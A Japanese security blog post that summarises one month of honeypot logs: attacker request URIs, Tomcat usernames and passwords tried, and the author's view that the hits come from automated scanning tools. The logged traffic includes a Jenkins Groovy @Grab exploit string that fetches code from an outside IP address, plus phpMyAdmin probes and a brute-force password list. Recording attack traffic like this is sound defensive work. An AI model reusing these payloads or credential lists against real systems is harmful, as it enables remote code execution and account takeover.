Nickセキュリティログ

ハニーポット、バグバウンティ、CTFなどなどセキュリティ関係のことを備忘録がてら書いていきます

2019年5月27日 BW-pot観察まとめ

1.トップ画面

f:id:NickShadows:20190528220407p:plain:w500


2.直近1ヶ月折れ線グラフ

f:id:NickShadows:20190528220432p:plain:w500


3.GETリクエスト

no uri Co
1 /manager/html 137
2 / 46
3 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD; 5
4 /PHPMYADMIN/scripts/setup.php 1
5 /phpmyadmin/setup.php 1
6 /phpMyAdmin/setup.php 1
7 /w00tw00t.at.blackhats.romanian.anti-sec:) 1
8 /phpmy/scripts/setup.php 1
9 /pma/scripts/setup.php 1
10 /phpmyadmin/setup.php/index.php 1
11 /pHpMyAdMiN/scripts/setup.php 1
12 /cgi-bin/config.exp 1
13 /echo.php 1
14 /latest/meta-data/ 1


4.POSTリクエスト

no uri Co
1 /tmUnblock.cgi 1


5.pypmyadminユーザー

アクセスなし


6.pypmyadminパスワード

アクセスなし


7.wordpressユーザー

アクセスなし


8.wordpressパスワード

アクセスなし


9.tomcatユーザー

no user Co
1 manager 34
2 tomcat 34
3 admin 34
4 root 34


10.tomcatパスワード

no pwd Co
1 rootroot 4
2 Admin 4
3 Passw0rd 4
4 nimda 4
5 pass 4
6 0 4
7 8888 4
8 1 4
9 toor 4
10 password 4
11 1q2w3e4r 4
12 1111 4
13 1234 4
14 admin 4
15 111 4
16 321 4
17 secret 4
18 1qazxsw2 4
19 tomcattomcat 4
20 654321 4
21 root 4
22 1qaz2wsx 4
23 manager 4
24 tomcat 4
25 4444 4
26 s3cret 4
27 admin123 4
28 root123 4
29 123qwe 4
30 123456 4
31 12345 4
32 123 4
33 111111 4
34 4


11.直近24時間新着アクセス

なし


12.まとめ

tomcatへのザ・ツールを使用したアクセス。
気分でスキャンしてみた~って感じ。